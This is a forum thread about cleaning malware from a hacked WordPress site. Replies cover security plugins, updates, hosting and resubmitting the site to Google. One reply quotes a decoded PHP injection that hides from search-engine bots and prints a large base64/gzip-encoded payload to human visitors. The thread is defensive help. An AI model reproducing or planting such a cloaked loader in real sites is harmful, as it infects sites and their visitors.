Site was hacked...need help bad!

[Samar]

i think ur site isnt hacked its infected i face that prob also

[SoCalGaming]

If anyone would like to give this a shot and fix our site, we will be willing to compensate with some pay. Please email me for details.

[sambaker]

My site was infected too. What I did is installed this plugin http://wordpress.org/extend/plugins/wordfence/ purchase the premium options and run it. Without this plugin, it was a tedious task to find the infected files and delete it manually.

I'm not affiliate at all with the plugin developer, just trying to help from my experience.

Besides php files, if you run cache plugin, you cache files infected too.

[VuVu]

This could easily not be his / her problem. If the server in which he is hosted on has bad security measures another site could of been infected and is running rampant on the server. Do you know what security practices that GoDaddy uses on this server in question? GoDaddy has had some security problems in the past so it could possibly be that. To start helping you on this now. As others suggested is your wordpress up to date? Are all the plugins you have installed up to date? If so then this (if it's another site) could be a 0day exploit. If this is another sites vulnerability then you should be asking GoDaddy if they are using suphp, suhosin, open_basedir, etc. It wouldn't hurt to upload a php.ini file to have a look to see if php isn't outdated as I have seen some uppity up hosts use ancient php versions *cough* hostgaotr *cough*.

@Sambaker's solution could work for you as well, but if it's another site that has the vulnerability it might not work.

If you are still having problems and cannot seem to find help you can send me a pm and I can hopefully help you more. There are security audit IT companies out there but on a shared environment it could be hard to chase down.

Edit: If you're running any type of sales script you should also be backing up your site atleast daily,

Code: 

http://www.hotscripts.com/listing/backup-sites-and-dbs/

[nasavsisro]

This is Base 64 Code After Decode i fount this on script

Code: 

�Pif (!isset($ftl)){ global $ftl;$ftl=1;
		error_reporting(0);
		if(!preg_match('#bot|spider|crawl|slurp|yandex#i', $_SERVER['HTTP_USER_AGENT'])){
		print(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iHjfTuli1R5effXSZffTJR+VHh219/YvzyUWT15NPPjn8JdOsnc63mmWdX9Tv7vxifLv1RdbOP/nooztbd/TrH7STvL3zixef4ZvD/PKzq2I5q66+9xGBzD/65PL7h7/k/Pyzj87ranFCH82zjw6L862dvZ3PPtt5t7tz5/z8k88+qvFVNcs/Olx+9tHe/V/4C/c+/YW/cHdvl/7ZffgLf+H+wS/8hfcf4A/++AC/UaPde/v4E7/t4jN+6d69X/gLP93DXzv4/IF+dHDfNn1gmspv3GJP/zngXwBsh19HB8DgIb95z38TCN3njxn0A/149x4+/1QR3iFQnzKQHf1kn37Zeygj7I90957t1o3rnr6L/z/4NHx9d39P6KMkKWWHs8GuCyzxDpH0AwnXlEsCS9F4zM0eRTfH6PSQ0MGU1uawlAgB88MF8NjYDxExrzl5/KS/d56PiEYXIDjO3BvhCNe5cpZ3A8rPv6J8/x0JeKrkUHLCNMYejJ/UoHaMXDZgoCpMwYN+VhhdRhwhhcBX/GmntjXHa1KQb5YEf+f99N5wBMtP70QFrKzPFw7DhlkgBOG32qqIKOTGLbsb710HzG4IfesswvjL9nBm+nSAbFDXbNb7v2M0d+C+MBf2Q5RojLY+UOMP1WkGVGLFxhAv7HcCJD27X/3HNfMmPeM/8wxS1DyGQe6JfMUtT8gX1FIBhu068w3Ac6dGYOGevArGHGIQD3D+RtX8p293c7HwiUfQuAKdsfrUzkpm75M9Yw3CAm3sw5/Bbainp4KL9gePLBe6gA0bZuLp2WObiNarWqcuO4eEhmDtHoUzMAfWXP6Gf+h7/csUAZpQAvhsdD2zX/YBz46NMd/epH2sfA9LWPYKWWHGjjsb0hHyJQ/c6BlFwH62575lOgMr7WezjmBhvD0WQg8zHK9H6cRAtX3fUqO8LxZWDsQY7rkeoWTwM8LfljLuffnScg3+uQWgDxQUJ6NOJezIl0ZkPvUQGOAT53S5sfGXbrYjdLY6wrJDxIjdhMkHOToii5aCVrqFI60E7VlAGNCBnbodJ1mExUPLXvZNS2f5GLAEKZ1X1uc7D2RUuzsPDVoM8qF9xeKAIXD3ToykL/RjVMqAcfpo3KzKot366Bf+wo/uHM4/2ztsPvuIXfPFnfOq3io+2zkstj/du/+74pfPdj8p7vzit58VaCAO/nhWTdeLfNneaT757HVbF8uL752ff39r+b3i+9vw7z8pfvf5nTuHv+QHnzXi8e9+xi7/7p38cusH9MXjuxqB/D8BAAD//w==')));
		}
}

��

[SoCalGaming]

No idea what that means haha. Is that bad?

[Ifirst]

@SoCalGaming
I am currently busy these days , i have not time
I am sure you will find someone else to help you
Follow the guidelines i said above

[SoCalGaming]

Thanks again to everyone who has helped. I think the Malware has been removed, but I'm having issues getting GoDaddy to approve my site and having my site re-submitted to Google. If anyone wants to go ahead and help me out w/that, please send me a message.

[Ifirst]

Well go to your google webmaster account and resubmit your sitemap
Wait for 24 hours and your site will appear in search result @ google

[SoCalGaming]

How do I double check to make sure there is no more malware on the site? And what exactly do I write in the summary when I request Google to resubmit the site. I want to play this as safe as possible.